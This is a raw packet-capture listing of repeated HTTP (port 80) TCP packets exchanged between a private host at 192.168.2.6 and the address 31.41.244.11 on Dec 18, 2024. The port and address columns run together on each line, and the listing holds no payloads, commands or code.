                                                                                                                                                                  Dec 18, 2024 11:09:19.449141026 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.449389935 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.449430943 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.450361013 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.450408936 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.450589895 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.450630903 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.451559067 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.451601028 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.451608896 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.451653004 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.452748060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.452794075 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.452830076 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.452872038 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.453986883 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.454078913 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.454138041 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.454184055 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.455358982 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.455409050 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.455435038 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.455471039 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.456399918 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.456444979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.456480980 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.456521034 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.457914114 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.457926035 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.457966089 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.458837986 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.458883047 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.458931923 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.458971977 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.460088015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.460131884 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.460201979 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.460242033 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.461363077 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.461405993 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.461569071 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.461606026 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.462565899 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.462610960 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.462713003 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.462754965 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.463747978 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.463794947 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.463825941 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.463864088 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.464999914 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.465039968 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.465150118 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.465188980 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.466464996 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.466511965 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.466536045 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.466579914 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.467478991 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.467520952 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.467545986 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.467587948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.468725920 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.468770027 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.468852997 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.468897104 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.470046043 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.470089912 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.596579075 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.596636057 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.596641064 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.596687078 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.597124100 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.597168922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.597218037 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.597263098 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.598290920 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.598337889 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.598778009 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.598824978 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.598882914 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.598922968 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.600009918 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.600055933 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.600116014 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.600158930 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.601147890 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.601188898 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.601254940 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.601295948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.602327108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.602369070 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.602401972 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.602443933 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.603576899 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.603709936 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.603719950 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.603746891 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.604758978 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.604800940 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.604866028 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.604907036 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.605950117 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.605995893 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.606144905 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.606189013 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.607213020 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.607260942 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.607279062 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.607336998 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.608392000 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.608441114 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.608462095 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.608506918 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.609633923 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.609680891 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.609726906 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.609771013 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.610918999 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.610981941 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.611063957 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.611110926 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.612040997 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.612092972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.612126112 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.612173080 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.613205910 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.613260031 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.613312006 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.613353968 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.614420891 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.614469051 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.614526033 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.614572048 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.615647078 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.615693092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.615761042 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.615802050 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.616818905 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.616864920 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.616909981 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.616955996 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.617988110 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.618035078 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.618041992 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.618084908 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.619232893 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.619278908 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.619343996 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.619389057 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.620456934 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.620503902 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.620548010 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.620613098 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.621584892 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.621634007 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.621695995 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.621740103 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.622972965 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.623027086 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.623107910 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.623153925 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.624460936 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.624533892 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.624560118 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.624573946 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.625602961 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.625652075 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.625665903 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.625690937 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.626399994 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.626441002 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.626485109 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.626518965 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.627612114 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.627703905 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.627720118 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.627734900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.628813982 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.628855944 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.628895998 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.628928900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.630021095 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.630050898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.630073071 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.630091906 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.631246090 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.631297112 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.631350994 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.631386042 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.632445097 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.632491112 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.632797956 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.632836103 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.633733988 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.633780003 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.633809090 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.633843899 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.634921074 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.634958029 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.634974003 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.635006905 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.636023998 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.636039019 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.636060953 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.636080027 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.637259007 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.637305021 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.637321949 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.637357950 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.638456106 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.638492107 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.638528109 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.638566017 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.639725924 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.639767885 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.639808893 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.639851093 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.640889883 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.640928984 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.640950918 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.640985966 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.642035007 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.642080069 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.642162085 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.642199039 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.643287897 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.643330097 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.644375086 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.644414902 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.644494057 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.644506931 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.644534111 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.644555092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.645713091 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.645762920 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.646040916 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.646079063 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.646852016 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.646895885 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.647245884 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.647316933 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.648112059 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.648133039 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.648192883 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.648192883 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.649244070 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.649276018 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.649286985 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.649312019 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.650506020 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.650517941 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.650547981 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.651699066 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.651740074 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.652863026 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.652903080 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.652920961 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.652931929 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.652961969 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.654071093 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.654114008 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.654716015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.654756069 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.655301094 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.655319929 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.655342102 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.655359983 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.656555891 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.656599998 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.657531977 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.657576084 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.657730103 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.657742023 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.657772064 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.659146070 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.659157991 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.659192085 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.787975073 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.787993908 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.788093090 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.788372993 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.788386106 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.788541079 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.788541079 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.789483070 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.789526939 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.789556026 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.789602995 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.790648937 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.790699005 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.791172028 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.791214943 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.791980028 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.792027950 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.792258978 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.792300940 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.793117046 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.793159008 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.793337107 CET804989431.41.244.11192.168.2.6
